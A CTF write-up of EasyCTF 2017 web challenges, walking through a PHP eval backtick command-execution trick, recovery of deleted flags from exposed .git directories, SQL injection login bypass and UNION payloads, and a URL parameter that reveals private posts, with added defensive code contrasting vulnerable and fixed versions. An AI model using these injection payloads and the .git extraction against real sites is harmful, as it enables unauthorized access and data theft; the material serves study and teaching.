EasyCTF 2017 Web Write Up

Author: Jing Ling
Blog: HackFun

0x05 Web

problem

I found the cookie monster’s blog!

solution

TinyEval

problem

This page will evaluate anything you give it.

solution

My first thought was PHP's eval() function, so I typed echo("hello world") on a whim and was told the input was too long; testing showed that at most 11 characters are accepted.
A PHP trick helps here: backticks are the shell-execution operator, so a command can be run inside echo with very few characters.

[email protected]:~# cat 1.php 
<?php
eval("echo`ls`;");
?>
[email protected]:~# php 1.php 
1.php
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos

So I entered echo`ls`:

The flag file is visible, but its name is long; apart from echo``, only 5 more characters fit, so a more clever input is needed. After several tries:

echo`cat *`

Exactly 11 characters, and the flag appears:

Edge 1

problem

We found Edge inc’s website! Take a look at it here.

solution

The organisers warned that using a scanner gets you banned, and poking around by hand turned up nothing at first. The no-scanner warning suggested the challenge was about source-code leakage, so I tested the usual backup and VCS paths manually:

index.php~
index.php.vim
index.php.swp
index.php.swn
index.php.swo
index.php.old
index.php.txt
index.php.bak
index.php.zip
index.php.rar
/.svn
/.git

Requesting /.git finally produced a surprise:

rip-git

[email protected]:~# rip-git -v -u http://edge1.web.easyctf.com/.git/
[email protected]:~/.git# git log
commit ee9061b25d8a35bae8380339f187b44dc26f4999
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:11:47 2017 +0000

    Whoops! Remove flag.

commit afdf86202dc8a3c3d671f2106d5cffa593f2b320
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:11:45 2017 +0000

    Initial.

commit 15ca375e54f056a576905b41a417b413c57df6eb
Author: Fernando <[email protected]>
Date:   Sat Dec 14 12:50:09 2013 -0300

    initial version

commit 8ac4f76df2ce8db696d75f5f146f4047a315af22
Author: Fernando Mayo <[email protected]>
Date:   Sat Dec 14 07:36:18 2013 -0800

    Initial commit

Roll back to the commit before the flag was removed:

[email protected]:~/.git# git reset --hard afdf86202dc8a3c3d671f2106d5cffa593f2b320

flag.txt now appears in the root directory:

[email protected]:~/.git# cat flag.txt
easyctf{w3_ev3n_u53_git}

Recommended reading: 关于WEB敏感文件探测的一点思考 (Some thoughts on probing for sensitive web files)

Edge 2

problem

Last time we screwed up. But we’ve learned our lesson.

solution

Visiting /.git again, the result:

Directory listing is now forbidden, but the files themselves are still there. Running rip-git again still downloads everything, and from here on it is the same procedure as Edge 1:

[email protected]:~# rip-git -v -u http://edge2.web.easyctf.com/.git/
[email protected]:~/.git# git log
commit a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:12 2017 +0000

    Prevent directory listing.

commit 6b4131bb3b84e9446218359414d636bda782d097
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:10 2017 +0000

    Whoops! Remove flag.

commit 26e35470d38c4d6815bc4426a862d5399f04865c
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:09 2017 +0000

    Initial.

commit 15ca375e54f056a576905b41a417b413c57df6eb
Author: Fernando <[email protected]>
Date:   Sat Dec 14 12:50:09 2013 -0300

    initial version

Again, go back to the commit before the flag was removed:

[email protected]:~/.git# git reset --hard 26e35470d38c4d6815bc4426a862d5399f04865c
[email protected]:~/.git# cat flag.txt
easyctf{hiding_the_problem_doesn't_mean_it's_gone!}
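Edge 1 shows that a file deleted in a later commit is still in the repository history, and Edge 2 shows that turning off directory listing does not stop the .git objects from being served. As an added self-check for your own deployments (this is not code from the original write-up), the script below requests the git metadata files directly instead of relying on the directory index and classifies each response; the base URL, the User-Agent string and the injectable fetch hook are assumptions.

```python
import urllib.request
import urllib.error

# Request these files directly: a disabled directory index (Edge 2's fix)
# still leaves them readable if the .git directory sits in the web root.
GIT_PROBE_PATHS = (".git/HEAD", ".git/config")


def classify_git_response(status, body):
    """Classify one probe response (HTTP status, body text)."""
    if status != 200:
        return "not-exposed"
    text = body.strip()
    # HEAD holds "ref: refs/heads/..."; config starts with the [core] section
    if text.startswith("ref: refs/") or text.startswith("[core]"):
        return "exposed"
    # A 200 that is not git metadata is usually a soft-404 page: look manually
    return "suspicious"


def _http_fetch(url):
    """Default fetcher; returns (status, first 4 KiB of the body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-self-check"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def check_site(base_url, fetch=None):
    """Probe one host for every path in GIT_PROBE_PATHS; returns {path: verdict}.

    `fetch` is a hook taking a URL and returning (status, body) so the
    classification can be exercised without network access.
    """
    fetch = fetch or _http_fetch
    results = {}
    for path in GIT_PROBE_PATHS:
        status, body = fetch(base_url.rstrip("/") + "/" + path)
        results[path] = classify_git_response(status, body)
    return results


if __name__ == "__main__":
    print(check_site("http://localhost"))  # hypothetical host to audit
```

Any "exposed" verdict means the whole history is retrievable, so the remedy is to keep .git out of the document root (or deny it in the web server) and to treat any secret that was ever committed as leaked, rather than to add a "remove flag" commit.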

SQL Injection 1

problem

I need help logging into this website to get my flag! If it helps, my username is admin.
Running sqlmap or the likes will earn you an IP ban.

hint: What does “injection” mean? How can you “inject” code into your username to control the username lookup?

solution

Looking at the page source, the SQL statement is probably something like:

select * from users where username="admin" and password=""

So craft the password input:

" or "1"="1

select * from users where username="admin" and password="" or "1"="1"

flag:easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}

SQL Injection 2

problem

I’ve told my friend a billion times that the user called leet1337 doesn’t exist on this website, but he won’t listen. Could you please login as this user, even though it doesn’t exist in the database? Oh and also, make sure that the user has a power level over 9000!!!!
Running sqlmap or the likes will earn you an IP ban.

hint: The columns in the table are (not in order) username, password, power_level, and a unique id.

solution

From the hint, the SQL statement is probably:

select username, password, power_level, id from table where username="" and password=""

After several attempts with a union query, using # to comment out the rest of the statement:

" union select "leet1337", "leet1337", "leet1337", "9999"#

select username, password, power_level, id from table where username="" and password="" union select "leet1337", "leet1337", "leet1337", "9999"#"
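Both SQL Injection 1 and 2 work because the username and password are pasted into the statement text. Added illustration (not part of the original write-up) of that vulnerable lookup next to the prepared-statement version the first flag alludes to, using an in-memory SQLite table; the table schema and the stored row are constructed, and the two payloads are rewritten with single quotes and a `--` comment because SQLite uses those where the challenge's MySQL used `"` and `#`.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the challenge's users table; the
    # real column order was never shown, so this layout is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, "
               "password TEXT, power_level INTEGER)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'hunter2', 100)")
    return db


def login_vulnerable(db, username, password):
    # Input is spliced into the SQL text, so quotes, OR and UNION inside it
    # become part of the query: this is the bug both challenges exploit.
    sql = ("SELECT username, power_level FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    # Prepared statement: the values are bound separately from the SQL text,
    # so the same payloads are compared literally against the stored columns.
    sql = ("SELECT username, power_level FROM users "
           "WHERE username=? AND password=?")
    return db.execute(sql, (username, password)).fetchone()


# The two payloads from the write-up in SQLite syntax.
BYPASS_PASSWORD = "' OR '1'='1"                    # SQL Injection 1
UNION_USERNAME = "' UNION SELECT 'leet1337', 9001 -- "  # SQL Injection 2


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", BYPASS_PASSWORD))   # ('admin', 100)
    print(login_vulnerable(db, UNION_USERNAME, "x"))        # ('leet1337', 9001)
    print(login_safe(db, "admin", BYPASS_PASSWORD))         # None
    print(login_safe(db, UNION_USERNAME, "x"))              # None
```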

Blogbox

problem

I found another blog! Do you think you can find a flag on it?

Hint: Use the search bar to see all the public posts! (And only the public posts!)

solution

Searching as the hint suggests returns nothing useful no matter what is entered; the GET request for a search looks like this:

http://blogbox.web.easyctf.com/search?query=flag

Re-reading the hint that only the public posts are visible, it occurred to me that the search might also accept a public parameter.
Final URL: http://blogbox.web.easyctf.com/search?query=ctf&public=0
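The weakness here is that the visibility filter is taken from the query string, so any visitor can ask for the non-public posts. Added illustration (not code from the original post) of such a search handler next to one that decides visibility server-side from the viewer's session; the post records are constructed, the `query` and `public` parameter names follow the write-up, and the author-session flag is an assumption.

```python
# Constructed sample posts standing in for the blog's database.
POSTS = [
    {"title": "Welcome", "body": "first post on the new blog", "public": True},
    {"title": "Notes", "body": "draft ctf notes, keep private", "public": False},
]


def search_vulnerable(posts, request_args):
    """Visibility filter read from the request: public=0 reveals drafts."""
    query = request_args.get("query", "")
    want_public = request_args.get("public", "1") == "1"
    return [p["title"] for p in posts
            if query in p["body"] and p["public"] == want_public]


def search_safe(posts, request_args, viewer_is_author=False):
    """Visibility decided from the authenticated session, never the URL.

    Anonymous viewers only ever match public posts; a `public` parameter
    in the request is ignored entirely rather than validated.
    """
    query = request_args.get("query", "")
    return [p["title"] for p in posts
            if query in p["body"] and (p["public"] or viewer_is_author)]


if __name__ == "__main__":
    print(search_vulnerable(POSTS, {"query": "ctf", "public": "0"}))  # ['Notes']
    print(search_safe(POSTS, {"query": "ctf", "public": "0"}))        # []
```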

Web tunnel

problem

I was just going to search some random cat videos on a Saturday morning when my friend came up to me and told me to reach the end of this tunnel. Can you do it for me?

Hint: You should write a script for this. The tunnel goes on too deep for any normal human.

solution

Opening the site gives a QR code; the string decoded from it is the path of the next QR image, and so on down the tunnel. Time for a script:

import requests

# Public QR-decoding API and the name of the first image on the site
QR_api = 'https://api.qrserver.com/v1/read-qr-code/'
QR_name = 'DaicO7460493nYSuvLPW'

# Each decoded QR code is the file name of the next image; stop at the flag
while 'easyctf' not in QR_name:
    QR_url = 'http://tunnel.web.easyctf.com/images/' + QR_name + '.png'
    r = requests.get(url=QR_api, params={'fileurl': QR_url})
    QR_name = r.json()[0]["symbol"][0]["data"]

print(QR_name)  # easyctf{y0u_sh0uld_b3_t1r3d_tr4v3ll1ng_all_th1s_w4y}